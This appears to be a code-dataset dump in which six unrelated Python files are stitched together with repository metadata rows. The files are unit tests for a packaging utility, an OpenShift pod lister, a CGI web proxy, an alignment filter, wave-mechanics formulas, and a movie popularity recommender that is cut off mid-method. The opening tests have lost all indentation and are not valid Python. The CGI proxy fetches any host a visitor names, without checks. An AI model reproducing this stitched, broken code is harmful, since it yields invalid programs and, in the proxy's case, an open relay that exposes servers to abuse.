classifiers = ['Development Status :: 4 - Beta']
class_str = utils.list2str(classifiers, indent=len("classifiers = ") + 1)
assert class_str == "['Development Status :: 4 - Beta']"
classifiers = []
class_str = utils.list2str(classifiers, indent=len("classifiers = ") + 1)
assert class_str == "[]"
classifiers = ['Development Status :: 4 - Beta']
class_str = utils.list2str(classifiers, brackets=False)
assert class_str == "'Development Status :: 4 - Beta'"
class_str = utils.list2str(classifiers, brackets=False, quotes=False)
assert class_str == "Development Status :: 4 - Beta"
class_str = utils.list2str(classifiers, brackets=True, quotes=False)
assert class_str == "[Development Status :: 4 - Beta]"
def test_exceptions2exit():
@utils.exceptions2exit([RuntimeError])
def func(_):
raise RuntimeError("Exception raised")
with pytest.raises(SystemExit):
func(1)
def test_ObjKeeper():
@six.add_metaclass(utils.ObjKeeper)
class MyClass(object):
pass
obj1 = MyClass()
obj2 = MyClass()
assert MyClass.instances[MyClass][0] is obj1
assert MyClass.instances[MyClass][1] is obj2
def test_capture_objs():
import string
ref = utils.capture_objs(string.Template)
my_template = string.Template("")
assert my_template is ref[-1]
def test_git2pep440():
ver = "1.0-1-gacf677d"
assert utils.git2pep440(ver) == "1.0.post0.dev1+gacf677d"
ver = "2.0"
assert utils.git2pep440(ver) == "2.0"
ver = "2.0-2-g68b1b7b-dirty"
assert utils.git2pep440(ver) == "2.0.post0.dev2+g68b1b7b.dirty"
ver = "3.0-dirty"
assert utils.git2pep440(ver) == "3.0+dirty"
with pytest.raises(RuntimeError):
ver = "3.0-dirty-1-1-1"
utils.git2pep440(ver)
def test_levenshtein():
s1 = "born"
s2 = "burn"
assert utils.levenshtein(s1, s2) == 1
s2 = "burnt"
assert utils.levenshtein(s1, s2) == 2
assert utils.levenshtein(s2, s1) == 2
s2 = ""
assert utils.levenshtein(s2, s1) == 4
def test_utf8_encode():
s_in = six.u('äüä')
s_out = utils.utf8_encode(s_in)
assert isinstance(s_out, six.string_types)
def test_utf8_decode():
s_in = "äüä"
s_out = utils.utf8_decode(s_in)
assert isinstance(s_out, six.string_types)
def test_stash():
filename = 'my_file'
content = 'this is my file'
other_content = 'this is not my file'
with open(filename, 'w') as fh:
fh.write(content)
with utils.stash(filename):
with open(filename, 'w') as fh:
fh.write(other_content)
with open(filename) as fh:
file_content = fh.read()
assert file_content == other_content
with open(filename) as fh:
file_content = fh.read()
assert file_content == content
def test_get_files(tmpdir): # noqa
struct = {'subdir': {'script.py': '#Python script...'},
'root_script.py': '#Root Python script...'}
create_structure(struct)
files = utils.get_files("*.py")
assert 'root_script.py' in files
assert 'subdir/script.py' not in files
files = utils.get_files("**.py")
assert 'root_script.py' in files
assert 'subdir/script.py' in files
| 30.972527 | 79 | 0.645024 | 728 | 5,637 | 4.821429 | 0.229396 | 0.029915 | 0.041026 | 0.050142 | 0.460969 | 0.380912 | 0.345014 | 0.296581 | 0.280627 | 0.250427 | 0 | 0.026364 | 0.219443 | 5,637 | 181 | 80 | 31.143646 | 0.771364 | 0.009225 | 0 | 0.145833 | 0 | 0 | 0.204085 | 0.009317 | 0 | 0 | 0 | 0 | 0.263889 | 1 | 0.111111 | false | 0.006944 | 0.055556 | 0 | 0.173611 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621dda42b1b439d1af79df330e9e3b18b1217f57 | 1,110 | py | Python | examples/list-pods-async.py | GrahamDumpleton/openshift3-python-library | 9996041ea1d529b07a4dd1394ed49f68dc3967be | [
"BSD-2-Clause"
] | null | null | null | examples/list-pods-async.py | GrahamDumpleton/openshift3-python-library | 9996041ea1d529b07a4dd1394ed49f68dc3967be | [
"BSD-2-Clause"
] | null | null | null | examples/list-pods-async.py | GrahamDumpleton/openshift3-python-library | 9996041ea1d529b07a4dd1394ed49f68dc3967be | [
"BSD-2-Clause"
] | null | null | null | import asyncio
import powershift.endpoints as endpoints
import powershift.resources as resources
client = endpoints.AsyncClient()
async def run_query():
projects = await client.oapi.v1.projects.get()
#print(projects)
#print(resources.dumps(projects, indent=4, sort_keys=True))
#print()
    names = []
    for project in projects.items:
namespace = project.metadata.name
print('namespace=%r' % namespace)
pods = await client.api.v1.namespaces(namespace=namespace).pods.get()
for pod in pods.items:
names.append(pod.metadata.name)
print(' pod=%r' % pod.metadata.name)
# We are given the pod definition already, but this is just to
# show how you can also query by the name of the pod.
pod = await client.api.v1.namespaces(namespace=namespace).pods(name=pod.metadata.name).get()
print(' resource_version=%r' % pod.metadata.resource_version)
#print()
#print(resources.dumps(pods, indent=4, sort_keys=True))
loop = asyncio.get_event_loop()
loop.run_until_complete(run_query())
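# Equivalent single-call form on Python 3.7+ (an alternative to the explicit
# event-loop handling above, shown only as a sketch):
#   asyncio.run(run_query())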
| 28.461538 | 105 | 0.667568 | 144 | 1,110 | 5.076389 | 0.430556 | 0.065663 | 0.06156 | 0.04104 | 0.183311 | 0.131327 | 0.131327 | 0.131327 | 0 | 0 | 0 | 0.005794 | 0.222523 | 1,110 | 38 | 106 | 29.210526 | 0.841251 | 0.228829 | 0 | 0 | 0 | 0 | 0.057715 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.176471 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621ef2979ee7e4768b8c9811a39438006a24e1a0 | 2,086 | py | Python | tests/data23/recipe-286160.py | JohannesBuchner/pystrict3 | f442a89ac6a23f4323daed8ef829d8e9e1197f90 | [
"BSD-2-Clause"
] | 1 | 2020-06-05T08:53:26.000Z | 2020-06-05T08:53:26.000Z | tests/data23/recipe-286160.py | JohannesBuchner/pystrict3 | f442a89ac6a23f4323daed8ef829d8e9e1197f90 | [
"BSD-2-Clause"
] | 1 | 2020-06-04T13:47:19.000Z | 2020-06-04T13:47:57.000Z | tests/data23/recipe-286160.py | JohannesBuchner/pystrict3 | f442a89ac6a23f4323daed8ef829d8e9e1197f90 | [
"BSD-2-Clause"
] | 1 | 2020-11-07T17:02:46.000Z | 2020-11-07T17:02:46.000Z | #!/usr/bin/python
# v0.01
# cgiproxy.py
# Copyright Michael Foord
# Not for use in commercial projects without permission. (Although permission will probably be given).
# If you use this code in a project then please credit me and include a link back.
# If you release the project then let me know (and include this message with my code !)
# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
# Use at your own risk !!!
# E-mail or michael AT foord DOT me DOT uk
# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
import sys
import cgi
import urllib.request, urllib.error, urllib.parse
sys.stderr = sys.stdout
HOMEPAGE = 'www.google.co.uk'
######################################################
def getform(valuelist, theform, notpresent=''):
"""This function, given a CGI form, extracts the data from it, based on
valuelist passed in. Any non-present values are set to '' - although this can be changed.
(e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
data = {}
for field in valuelist:
if field not in theform:
data[field] = notpresent
else:
if type(theform[field]) != type([]):
data[field] = theform[field].value
else:
values = [x.value for x in theform[field]] # allows for list type values
data[field] = values
return data
def pagefetch(thepage):
req = urllib.request.Request(thepage)
u = urllib.request.urlopen(req)
data = u.read()
return data
###################################################
if __name__ == '__main__':
form = cgi.FieldStorage()
data = getform(['url'],form)
if not data['url']: data['url'] = HOMEPAGE
print("Content-type: text/html") # this is the header to the server
print() # so is this blank line
test = pagefetch('http://' + data['url'])
print(test)
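# Usage sketch (assumed deployment, not part of the recipe): installed as a CGI
# script, the proxied page is chosen with the "url" query parameter, e.g.
#   http://yourserver/cgi-bin/cgiproxy.py?url=www.python.org
# With no "url" parameter the HOMEPAGE default defined above is fetched instead.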
| 32.59375 | 131 | 0.603547 | 278 | 2,086 | 4.5 | 0.514388 | 0.031175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001927 | 0.253595 | 2,086 | 63 | 132 | 33.111111 | 0.801541 | 0.441994 | 0 | 0.133333 | 0 | 0 | 0.063953 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.1 | 0 | 0.233333 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621fd513a88d7b05361f336712c14f6c6163f5f9 | 572 | py | Python | helpers/filter_msa.py | carnevale-lab/torch_ising_vae | f2b7b8581cf416e907c57f16b5eb7a9d86b31644 | [
"CC0-1.0"
] | null | null | null | helpers/filter_msa.py | carnevale-lab/torch_ising_vae | f2b7b8581cf416e907c57f16b5eb7a9d86b31644 | [
"CC0-1.0"
] | null | null | null | helpers/filter_msa.py | carnevale-lab/torch_ising_vae | f2b7b8581cf416e907c57f16b5eb7a9d86b31644 | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
import numpy as np
from mi3gpu.utils import seqload
from mi3gpu.utils import seqtools
from numpy.random import randint
import sys, os
s = seqload.loadSeqs(sys.argv[1])[0]
cutoff = 1-float(sys.argv[2])
L = s.shape[1]
inds = []
out_seq = []
while s.shape[0] != 0:
ind = randint(s.shape[0])
out_seq.append(s[ind].copy()) # no ref to s
s = s[np.sum(s == s[ind,:], axis=1)/float(L) < cutoff,:]
print(s.shape, file=sys.stderr)
with os.fdopen(sys.stdout.fileno(), 'wb', closefd=False) as fp:
seqload.writeSeqs(fp, np.array(out_seq))
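# Usage sketch (inferred from the sys.argv handling above; file name and value are
# placeholders): argv[1] is the sequence file, argv[2] sets the similarity
# threshold (used as cutoff = 1 - value); filtered sequences go to stdout and the
# shrinking array shapes are printed to stderr.
#   python filter_msa.py seqs 0.9 > filtered_seqs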
| 26 | 63 | 0.664336 | 102 | 572 | 3.696078 | 0.509804 | 0.06366 | 0.079576 | 0.111406 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024896 | 0.157343 | 572 | 21 | 64 | 27.238095 | 0.757261 | 0.057692 | 0 | 0 | 0 | 0 | 0.003724 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.294118 | 0 | 0.294118 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62209a22393da7cbf79c4e663695c5b9383b285b | 14,659 | py | Python | wave_funcs.py | csherwood-usgs/waves | 7ec505d4d73a7bb6c6959a59083dd99b25fae572 | [
"CC0-1.0"
] | null | null | null | wave_funcs.py | csherwood-usgs/waves | 7ec505d4d73a7bb6c6959a59083dd99b25fae572 | [
"CC0-1.0"
] | null | null | null | wave_funcs.py | csherwood-usgs/waves | 7ec505d4d73a7bb6c6959a59083dd99b25fae572 | [
"CC0-1.0"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
# Abreu, T., Silva, P.A., Sancho, F., and Temperville (2010)
# Analytical approximate wave form for asymmetric waves.
# Coastal Engineering, 57(7):656-667.
# doi: http://dx.doi.org/10.1016/j.coastaleng.2010.02.005.
#
# Malarkey, J. and A. G. Davies (2012) Free-stream velocity descriptions
# under waves with skewness and asymmetry.
# Coastal Engineering, 68:78-95.
# doi: http://dx.doi.org/10.1016/j.coastaleng.2012.04.009.
#
# Ruessink, B. G., G. Ramaekers, and L. C. van Rijn (2012)
# On the parameterization of the free-stream non-linear wave orbital
# motion in nearshore morphodynamic models. Coastal Engineering, 6556-63.
# doi: http://dx.doi.org/10.1016/j.coastaleng.2012.03.006.
#
# van Rijn, L. C., P. K. Tonnon, and D. J. R. Walstra (2011)
# Numerical modelling of erosion and accretion of plane sloping beaches
# at different scales. Coastal Engineering, 58: 637-655.
# doi: http://dx.doi.org/10.1016/j.coastaleng.2011.01.009.
#
# Functions for calculating wave asymmetry
# In[16]:
def wavelength_L(T, h):
"""
Calculate depth-dependent wavelength
Input:
T - wave period [s]
h - water depth [m]
Returns:
L - wavelength [m]
"""
g = 9.81
    w = 2*np.pi/T
kh = qkhfs(w,h)
L = g*T*T/(2*np.pi)*(np.tanh(kh))
return L
def iribarren(B, H, T, location="deepwater"):
"""
Calculate Iribarren wavenumber
Battjes, 1974
Description of breaker types
https://en.wikipedia.org/wiki/Iribarren_number
Input:
B - beach slope as fraction rise/run []
H - wave height at either deepwater or breakpoint [m]
T - wave period [s]
location - Either "deepwater" [default] or "breakpoint"
Returns:
I - Iribarren number, dimensionless number []
descr - description of breaker type [string]
"""
g = 9.81
Lo = (g*T**2)/(2*np.pi)
I = B/np.sqrt(H/Lo)
# description of breaker type
    if location == "deepwater":
c = np.array((0.5, 3.3))
else:
c = np.array((0.4,2.0))
if I < c[0]:
descr = "spilling"
    elif I > c[1]:
descr = "surging/collapsing"
else:
descr = "plunging"
return I, descr
def breaker_type(I,location="deepwater"):
"""
Description of breaker types
https://en.wikipedia.org/wiki/Iribarren_number
Input:
I = Iribarren number, dimensionless number
location - Either "deepwater" [default] or "breakpoint"
"""
    if location == "deepwater":
c = np.array((0.5, 3.3))
else:
c = np.array((0.4,2.0))
if I < c[0]:
return "spilling"
    elif I > c[1]:
return "surging/collapsing"
else:
return "plunging"
def reverse_shoal(H,T,h):
"""
    Compute offshore wave height by assuming conservation of energy flux E*Cg
Nielsen (2009) eqn. 1.7.5
Input:
H - Wave height in intermediate depth h (not breaking) [m]
T - Wave period [s]
h - Water depth associated with H [m]
Returns:
Ho - Wave height in deepwater [m]
"""
w = 2*np.pi/T
kh = qkhfs(w,h)
Ks = 1./( np.sqrt(np.tanh(kh)*(1.+2.*kh/np.sinh(2.*kh))))
Ho = H/Ks
return Ho
def ursell( Hs, T, h ):
"""
Calculate Ursell number
Reussink et al. Eqn 6.
"""
w = 2*np.pi/T
kh = qkhfs(w,h)
k = kh/h
Ur =0.75*0.5*Hs*k/(kh)**3.
return Ur
def qkhfs( w, h ):
"""
Quick iterative calculation of kh in gravity-wave dispersion relationship
kh = qkhfs(w, h )
Input
w - angular wave frequency = 2*pi/T where T = wave period [1/s]
h - water depth [m]
Returns
kh - wavenumber * depth [ ]
Orbital velocities from kh are accurate to 3e-12 !
RL Soulsby (2006) \"Simplified calculation of wave orbital velocities\"
HR Wallingford Report TR 155, February 2006
Eqns. 12a - 14
"""
g = 9.81
x = w**2.0 *h/g
y = np.sqrt(x) * (x<1.) + x *(x>=1.)
# is this faster than a loop?
t = np.tanh( y )
y = y-( (y*t -x)/(t+y*(1.0-t**2.0)))
t = np.tanh( y )
y = y-( (y*t -x)/(t+y*(1.0-t**2.0)))
t = np.tanh( y )
y = y-( (y*t -x)/(t+y*(1.0-t**2.0)))
kh = y
return kh
def ruessink_assym( Ur ):
"""
    Calculate asymmetry parameters from Ursell number
rp = ruessink_assym( Ur )
Ruessink et al., 2012, Coastal Engineering 65:56-63.
"""
dtr = np.pi/180.
# Calculate B and phi from RRvR p. 58
p1 = 0.
p2 = 0.857
p3 = -0.471
p4 = 0.297
#B = p1 + (p2 - p1)/(1 + exp( (p3-log(Ur))/p4 )) # RRvR Eqn. 9
B = p1 + (p2 - p1)/(1 + np.exp( (p3-np.log10(Ur))/p4 )) # RRvR Eqn. 9, log10 per S. Suttles
p5 = 0.815
p6 = 0.672
psi = dtr*(-90.) + dtr*90. * np.tanh(p5/(Ur**p6)) # RRvR Eqn. 10.
# b can be used directly in MD equations
b = np.sqrt(2.)*B/(np.sqrt(B**2+9.)) # Solution to RRvR Eqn. 11
r = 2.*b/(b**2+1.)
phi = -psi-np.pi/2. # RRvR Eqn. 12
# dimensionless velocity and acceleration skewness
# RRvR Eqn. 5 and MD Eqn 4a,b
Su = B*np.cos(psi)
Au = B*np.sin(psi)
return (r,phi,Su,Au)
def abreu_pts(r, phi, Uw, T ):
"""
    Calculate umax, umin, and phases of asymmetrical wave orbital velocity
    af = abreu_pts( r, phi, Uw, T )
    Input:
    r and phi - asymmetry parameters from Ruessink et al.
Uw - amplitude of orbital velocity (m/s)
T - wave period
Returned:
T - wave period (s)
DTc - duration under crest (s)
DTt - duration under trough (s)
(T = DTc + DTt)
DTcu - duration of acceleration under crest (s)
    DTtu - duration of acceleration under trough (s)
Tzd - time of zero down-crossing (s)
Tzu - time of zero up-crossing (s)
Tc - time of maximum velocity under crest (s)
Tt = - time of minimum velocity under trough (s)
umax - maximum velocity under crest (m/s)
umin - minimum velocity under trough (m/s)
R - Velocity skewness parameter == umax/(umax-umin) ()
Beta - Acceleration skewness parameter == amax/(amax-amin) ()
    Sk    - van Rijn et al. 2011 (Eqn 2) asymmetry statistic ()
    As    - van Rijn et al. 2011 (Eqn 2) asymmetry statistic ()
"""
w = 2*np.pi/T
# alternative formulation Eqns 16a,b in Malarkey & Davies
phi = -phi
P = np.sqrt(1.-r*r) # same as f
b = r/(1.+P)
# Appendix E of Malarkey & Davies
# phase of umax (crest) and umin (trough) (in radians, from 0 to 2*pi)
c = b*np.sin(phi)
tmc = np.arcsin((4.*c*(b*b-c*c)+(1.-b*b)*(1.+b*b-2.*c*c))/((1.+b*b)**2-4.*c*c))
tmt = np.arcsin((4.*c*(b*b-c*c)-(1.-b*b)*(1.+b*b-2.*c*c))/((1.+b*b)**2-4.*c*c))
if(tmt<0.):
tmt = tmt+2.*np.pi
if(tmc<0.):
tmc = tmc+2*np.pi
# umax and umin - non dimensional
    umax = 1.+c
umin = umax-2.
# dimensional
umax = Uw*umax
umin = Uw*umin
# phase of zero upcrossing and downcrossing (radians)
tzu = np.arcsin(b*np.sin(phi)) # = arcsin(c)
tzd = 2.*np.arccos(c)+tzu
    # Calculate asymmetry parameters R and Beta
# R = umax/(umax-umin) % gives same result as:
R = 0.5*(1.+ b*np.sin(phi) ) # MD Eqn 17
# after MD Eqn. 18
Fo = (r<=.5) * (1.-0.27*(2.*r)**2.1) + (r> .5) * (0.59 + 0.14*(2.*r)**-6.2)
# MD Eqn. 15b
Br0 =(r< 0.5)* (0.5*(1+r)) + (r>=0.5)* ( 4.*r*(1.+r)/(4.*r*(1.+r)+1.) )
Beta = 0.5+(Br0-0.5)*np.sin(0.5*np.pi-np.abs(phi))*Fo/np.sin(0.5*np.pi*Fo)
    # Calculate asymmetry parameters Sk and As (same as van Rijn et al. 2011 Eqn. 2)
Sk = 3.*b*np.sin(phi)/np.sqrt(2.*(1.+b**2))**3
As = -3.*b*np.cos(phi)/np.sqrt(2.*(1.+b**2))**3
# (Could also use MD Appendix C to calculate uspike, aspike, and other
    # measures of asymmetry.)
# These are the dimensional fractions of wave periods needed by Van der A eqn.
DTc = (tzd-tzu)/w
DTt = T - DTc
DTcu = (tmc-tzu)/w
DTtu = (tmt-tzd)/w
Tzd = (tzd)/w
Tzu = (tzu)/w
Tc = (tmc)/w
Tt = (tmt)/w
return {'T':T, 'DTc':DTc, 'DTt':DTt, 'DTcu':DTcu, 'DTtu':DTtu, 'Tzd':Tzd, 'Tzu':Tzu,'Tc':Tc,'Tt':Tt, 'umax':umax,'umin':umin,'R':R,'Beta':Beta,'Sk':Sk,'As':As}
def abreu_ut ( r, phi, Uw, T, iplot=0, n=50):
"""
Calculate u(t) and a(t) using Abreu et al. (2010) eqn. 7
"""
w = 2.*np.pi/T
wt = np.linspace( 0., 2.*np.pi, n) # phase
f = np.sqrt( 1. - r**2 )
numer = np.sin(wt) + ( r*np.sin(phi)/(1.+np.sqrt(1.-r**2)) )
denom = (1.-r*np.cos(wt+phi))
ut = Uw*f*numer/denom
numer2 = np.cos(wt)-r*np.cos(phi)-r**2/(1.+np.sqrt(1.-r**2))*np.sin(phi)*np.sin(wt+phi)
at = Uw*w*f*numer2/denom**2
    # dimensional values (ut and at above already carry the Uw and Uw*w factors)
    t = wt/w
    u = ut
    a = at
if iplot:
#plot time series of velocity and acceleration
plt.plot(t,a,linewidth=2,color='firebrick',label='Acceleration')
plt.plot(t,u,linewidth=2,color='cornflowerblue',label='Velocity');
plt.ylabel('u (m/s); du/dt (m/s^2)')
plt.xlabel('Time (s)')
# find critical points and plot
af = abreu_pts( r, phi, Uw, T )
plt.plot(af['Tc'],af['umax'],marker='^',color='blue',label='umax')
plt.plot(af['Tt'],af['umin'],marker='v',color='red',label='umin')
plt.plot([ af['Tzu'], af['Tzu']+af['DTc']],[-1.2, -1.2],linewidth=4,color='blue',label='crest');
plt.plot([ af['Tzd'], af['Tzd']+af['DTt']],[-1.2, -1.2],linewidth=4,color='red',label='trough');
plt.plot([ af['Tzu'], af['Tzu']+af['DTcu']],[-1.1, -1.1],linestyle=':',linewidth=4,color='blue',label='accel');
plt.plot([ af['Tzd'], af['Tzd']+af['DTtu']],[-1.1, -1.1],linestyle=':',linewidth=4,color='red',label='decel');
plt.legend()
return wt, ut, at
def soulsby_ws( D, rhos=2650., rhow=1027., nu=1.36e-6 ):
"""
Calculate settling velocity for sand
Input:
D - grain size (m)
rhos - sediment density (kg/m3; optional, default = 2650)
rhow - water density (kg/m3; optional, default = 1027)
nu - kinematic viscosity (m2/s; optional, default = 1.36e-6)
Returns:
ws - settling velocity (m/s)
Soulsby, 1997, p. 132 - 137
"""
g = 9.81
s = rhos/rhow
Dstar = D*((g*(s-1.))/(nu*nu))**(1./3.) # eqn. 98
    ws = (nu/D)*( np.sqrt(10.36**2+1.049*Dstar**3.) - 10.36 ) # eqn. 102
return ws
def soulsby_theta_crit( d, rhos=2650., rhow=1027., nu= 1.36e-6):
"""
    Critical Shields number (MKS units)
theta_crit = soulsby_theta_crit( d, rhos, rhow, nu )
Input (MKS units):
d - diameter (m)
rhos - sediment density (optional, default = 2650 kg/m3)
rhow - water density (optional, default = 1027 kg/m3)
nu - kinematic viscosity (optional, default = 1.36e-6 m2 s-1)
From Soulsy (1997) 'Dynamics of Marine Sands'
csherwood@usgs.gov
last revised March, 2015
"""
g = 9.81 # m s-2
s = rhos/rhow # p. 104
Dstar = d*(g*(s-1.)/(nu**2.))**(1./3.) # Eqn 75
    Shields_crit = 0.3/(1.+1.2*Dstar) + 0.055*(1.-np.exp(-0.020*Dstar)) # Eqn 77
return Shields_crit
def od_ripple( d50, Psi ):
"""
    Calculate O'Donoghue et al. (2006) ripple geometry
Input:
d50 - median grain size (m)
Psi - mobility number, max of crest or trough flow
Returns:
Hoa - ripple height normalized by orbital amplitude A
Hoa - ripple length normalized by orbital amplitude A
van der A et al. (2013) Appendix B.
"""
d50mm = 1.e3*d50 #convert from m to mm
mL = 0.73
mH = 0.55
if(d50mm>=0.22):
fac = (d50mm-0.22)/(0.3-0.22)
mH = mH+0.45*fac
mL = mL+0.27*fac
if(d50mm>=0.3):
mH = 1.
mL = 1.
# smooth transition to upper flat bed regime
nH = 1.
if(Psi>190.):
        nH = 0.5*(1.+np.cos( np.pi*(Psi-190.)/(240.-190.) ))
if(Psi>250.):
nH = 0.
nL = nH
print(mH, nH, mL, nL)
Hoa = max(0., mH*nH*(0.275-0.022*Psi**0.42) )
Loa = max(0., mL*nL*(1.97-0.44*Psi**0.21) )
return Hoa, Loa
def dsf_func(d50, theta ):
"""
    Calculate sheet flow thickness
Input:
d50 - median grain size (m)
       Theta - maximum (crest or trough) Shields parameter
Returns:
dsf - thickness of sheet flow layer (m)
Based on Janssen (1999) in van der A et al. (2013), Appendix C.
See also Dohmen-Janssen et al. (2001), JGR 106(C11):27,103-27,115, Eqn. 6 & 7
"""
d50mm = 1.e3*d50
deln = 25.*theta
if (d50mm > 0.15 ):
deln = deln-12.*(d50mm-0.15)/(0.2-0.15)
if (d50mm >= 0.2 ):
deln = 13.*theta
dsf=max( deln*d50, d50 ) # unstated, but assume dsf = d50 when theta = 0
return dsf
def ksd_func( d50, d90, rh=0., rl=1.e-6, theta=0. ):
"""
Calculate current-related bed roughess
zo = ksd/30
Input:
d50 - median grain size (m)
d90 - 90th percentile grain size (m)
rh - ripple height (m)
       rl - ripple wavelength (m)
theta - time-averaged absolute Shields stress
Returns:
ksd - roughness (m)
Based on Ribberink (1998) in van der A et al. (2013), Appendix A.
"""
rh = max(rh,d50)
rl = max(rl,d50) # avoid divide-by-zero
# Eqn. A.2
mu = 6.
d50mm = d50*1.e3
if( d50mm > 0.15 ):
mu = 6. - 5.*(d50mm-0.15)/(0.2-0.15)
if( d50mm >= 0.2 ):
mu = 1.
# eqn A.1
ksd = max(3.*d90, d50*(mu+6.*(theta-1.))) + 0.4*rh*rh/rl
return ksd
def ksw_func( d50, rh=0., rl=1.e-6, theta=0. ):
"""
    Calculate wave roughness
Input:
d50 - median grain size (m)
rh - ripple height (m)
       rl - ripple wavelength (m)
theta - time-averaged absolute Shields stress
Returns:
ksw - roughness (m)
Based on Ribberink (1998) in van der A et al. (2013), Appendix A.
"""
rh = max(rh,d50)
rl = max(rl,d50) # avoid divide-by-zero
# Eqn. A.2
mu = 6.
d50mm = d50*1.e3
if( d50mm > 0.15 ):
mu = 6. - 5.*(d50mm-0.15)/(0.2-0.15)
if( d50mm >= 0.2 ):
mu = 1.
# eqn A.5
ksw = max(d50, d50*(mu+6.*(theta-1.))) + 0.4*rh*rh/rl
return ksw
def fw_func(ahat,ksw):
fw = 0.3
aksw = ahat/ksw
if aksw > 1.587:
        fw = 0.00251*np.exp(5.21*aksw**(-0.19)) # Eqn. A4, A5
return fw
def fd_func( dsf, ksd ):
vk = 0.41
    fd = 2.*(vk/np.log(30.*dsf/ksd))**2. # Eqn. 20
return fd
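# Hedged usage sketch (not part of the original module; the wave parameters below
# are illustrative only). The intended chain for an asymmetric free-stream
# velocity time series is: Ursell number -> Ruessink et al. (2012) shape
# parameters -> Abreu et al. (2010) wave form.
if __name__ == "__main__":
    Hs, T, h = 1.5, 8.0, 4.0   # significant wave height (m), period (s), depth (m)
    Uw = 0.5                   # orbital velocity amplitude (m/s), assumed value
    Ur = ursell(Hs, T, h)
    r, phi, Su, Au = ruessink_assym(Ur)
    wt, ut, at = abreu_ut(r, phi, Uw, T, iplot=0)
    print("Ur =", Ur, "r =", r, "phi =", phi, "umax =", ut.max())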
| 31.457082 | 187 | 0.547991 | 2,386 | 14,659 | 3.356245 | 0.222548 | 0.006993 | 0.006244 | 0.005994 | 0.285465 | 0.235764 | 0.201174 | 0.174076 | 0.157592 | 0.124625 | 0 | 0.08373 | 0.283034 | 14,659 | 465 | 188 | 31.524731 | 0.678211 | 0.472815 | 0 | 0.256039 | 0 | 0 | 0.046242 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082126 | false | 0 | 0.009662 | 0 | 0.183575 | 0.004831 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6223110d6703746164e9a053ac39f3e64e1c1273 | 2,587 | py | Python | popularity_model.py | HeGsnS/Recommendation_system_using_RL_RecSim | 41b2ab793a3f77ed20cc3029d70f8796e757fc80 | [
"MIT"
] | 14 | 2020-03-19T01:49:54.000Z | 2021-07-12T07:24:11.000Z | popularity_model.py | HeGsnS/Recommendation_system_using_RL_RecSim | 41b2ab793a3f77ed20cc3029d70f8796e757fc80 | [
"MIT"
] | 1 | 2020-04-07T08:38:46.000Z | 2020-04-07T08:38:46.000Z | popularity_model.py | HeGsnS/Recommendation_system_using_RL_RecSim | 41b2ab793a3f77ed20cc3029d70f8796e757fc80 | [
"MIT"
] | 8 | 2020-03-16T04:56:03.000Z | 2021-11-08T11:27:44.000Z | import numpy as np
import pandas as pd
class PopularityRecommender:
def __init__(self,user_data,slate_size,mode = "0"):
self.user_data = user_data
print("total unique movie ",len(np.unique(user_data["movieId"].values)))
self.slate_size = slate_size
self.mode = mode
self.positive_rating_count,self.avg_rating_count = self.generate_popularity_table()
def generate_popularity_table(self):
positive_data = self.user_data[self.user_data['rating'] > 3]
items_positive_data_count = positive_data.groupby('movieId').size().reset_index()
items_positive_data_count.columns = ['movieId', 'number of positive rating']
item_data_average_rating = self.user_data[['movieId','rating']].groupby('movieId').mean().reset_index()
item_data_average_rating.columns = ['movieId','avg_rating']
return [items_positive_data_count,item_data_average_rating]
def step(self,reward,observation):
doc = observation['doc']
user = observation['user']
user_id = user['user_id']
user_past_record_ids = user['record_ids']
user_past_record = user['past_record']
doc_ids = list(doc.keys())
score_list = np.zeros(len(doc_ids))
# print("doc ids : ",doc_ids)
if self.mode == "0":
# print('option 0 ')
use_dataset = self.positive_rating_count
# print("total unique movie id : ",len(use_dataset["movieId"].values))
else:
# print("option 1")
use_dataset = self.avg_rating_count
# print("total unique movie id : ", len(use_dataset["movieId"].values))
for index in range(len(doc_ids)):
id = doc_ids[index]
movie = use_dataset[use_dataset["movieId"] == int(id) ]
# print("movie info : ",movie)
movie = movie[use_dataset.columns[-1]].values
# print("count : ",movie)
if (len(movie) == 0):
score_list[index] = -1
else:
score_list[index] = movie[0]
score_list = np.asarray(score_list, dtype=np.float32)
# print("score lsit ",score_list)
# print("list of best index : ",score_list.argsort()[::-1])
